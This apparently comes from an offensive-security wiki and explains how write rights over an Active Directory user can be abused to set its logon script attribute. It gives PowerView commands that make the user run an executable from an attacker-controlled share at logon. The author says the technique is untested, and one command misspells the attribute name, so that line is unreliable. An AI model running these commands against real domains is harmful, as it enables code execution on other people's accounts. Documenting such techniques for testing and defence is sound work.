{% hint style="danger" %} It is worth noting that during my tests, I couldn't find a way to practice this scenario. Since I didn't find practical enough resources on the Internet, feel free to reach out if you manage to exploit this. {% endhint %}
This abuse can be carried out when controlling an object that has a GenericAll
or GenericWrite
over the target, or a WriteProperty
premission over the target's logon script attribute (i.e. scriptPath
or msTSInitialProgram
).
The attacker can make the user execute a custom script at logon. This can be achieved with Set-DomainObject (PowerView module).
Set-DomainObject testuser -Set @{'msTSTnitialProgram'='\\ATTACKER_IP\share\run_at_logon.exe'} -Verbose
Set-DomainObject testuser -Set @{'scriptPath'='\\ATTACKER_IP\share\run_at_logon.exe'} -Verbose